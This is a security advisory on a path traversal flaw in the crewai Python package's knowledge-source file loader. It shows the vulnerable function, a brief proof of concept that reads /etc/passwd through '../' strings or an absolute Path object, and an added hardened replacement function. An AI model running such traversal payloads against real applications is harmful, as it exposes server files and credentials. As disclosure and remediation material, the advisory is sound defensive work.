Description
Advisory Details
- Package ecosystem: pip
- Package name: crewai
- Affected versions: <= 0.108.0
- Patched versions: (none)
- Severity: Medium
- CWE: CWE-22 (Path Traversal)
Summary
convert_to_path() in crewai/knowledge/source/base_file_knowledge_source.py:88 joins the supplied path onto the knowledge directory without sanitizing ../ sequences. Passing a Path object bypasses the knowledge directory prefix entirely, allowing arbitrary files on the filesystem to be read.
Details
The BaseFileKnowledgeSource class processes file paths provided in the source parameter. The convert_to_path() method at line 88 performs a plain path join to build the full file path:

```python
from pathlib import Path
from typing import Union

def convert_to_path(self, source: Union[str, Path]) -> Path:
    # When source is a Path object, it bypasses the knowledge_dir prefix
    if isinstance(source, Path):
        return source  # No sanitization - returns attacker-controlled path as-is
    # String paths get concatenated without ../ sanitization
    return Path(self.knowledge_dir) / source  # ../../../etc/passwd works
```

When a string source contains ../ sequences, they are not sanitized, allowing traversal outside the intended knowledge directory. When a Path object is passed directly, the knowledge directory prefix is bypassed entirely.
PoC
```python
from crewai.knowledge.source.text_file_knowledge_source import TextFileKnowledgeSource
from pathlib import Path

# Method 1: String path traversal
source = TextFileKnowledgeSource(
    file_paths=["../../../etc/passwd"]
)
# Reads /etc/passwd by traversing out of knowledge directory

# Method 2: Path object bypass
source = TextFileKnowledgeSource(
    file_paths=[Path("/etc/passwd")]
)
# Directly reads /etc/passwd, bypassing knowledge_dir entirely
```

Impact
Any application that allows user-controlled input to CrewAI knowledge source paths can be exploited to read arbitrary files from the server filesystem. This can expose sensitive configuration files, credentials, and other private data.
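Mitigation example, added here and not part of the advisory or the crewai code base: a hypothetical `safe_convert_to_path()` that treats both str and Path inputs the same way, anchors them under the knowledge directory, resolves `..` and symlinks, and rejects anything that does not land strictly inside the resolved base. The `/tmp/kb` base and the `SAMPLE_SOURCES` list are constructed for the demonstration.

```python
from pathlib import Path
from typing import List, Tuple, Union

# Constructed sample inputs: the two PoC payloads from the advisory plus
# benign and normalised-but-contained cases.
SAMPLE_SOURCES: List[Union[str, Path]] = [
    "notes/a.txt",            # benign relative file
    "notes/../a.txt",         # '..' that still stays inside the base
    "../../../etc/passwd",    # string traversal (PoC method 1)
    Path("/etc/passwd"),      # absolute Path object (PoC method 2)
    "",                       # empty source would map to the base dir itself
]


def safe_convert_to_path(knowledge_dir: Union[str, Path],
                         source: Union[str, Path]) -> Path:
    """Hypothetical hardened replacement for convert_to_path()."""
    base = Path(knowledge_dir).resolve()
    candidate = Path(source)
    # Absolute inputs are never anchored under the base, so refuse them outright.
    if candidate.is_absolute():
        raise ValueError(f"absolute path not allowed: {source!r}")
    # Anchor under the base, then resolve '..' components and symlinks so the
    # containment check sees the real target (a symlink pointing outside the
    # base is rejected as well).
    full = (base / candidate).resolve()
    # Strict containment: the base must be a proper ancestor of the target.
    if base not in full.parents:
        raise ValueError(f"path escapes knowledge directory: {source!r}")
    return full


def is_safe_source(knowledge_dir: Union[str, Path], source: Union[str, Path]) -> bool:
    """True if the source would be accepted, False if it is rejected."""
    try:
        safe_convert_to_path(knowledge_dir, source)
        return True
    except ValueError:
        return False


def audit_sources(knowledge_dir: Union[str, Path],
                  sources: List[Union[str, Path]]) -> List[Tuple[str, bool]]:
    """Classify each candidate source as accepted (True) or rejected (False)."""
    return [(str(s), is_safe_source(knowledge_dir, s)) for s in sources]


if __name__ == "__main__":
    for src, ok in audit_sources("/tmp/kb", SAMPLE_SOURCES):
        print(f"{'accept' if ok else 'REJECT'}  {src!r}")
```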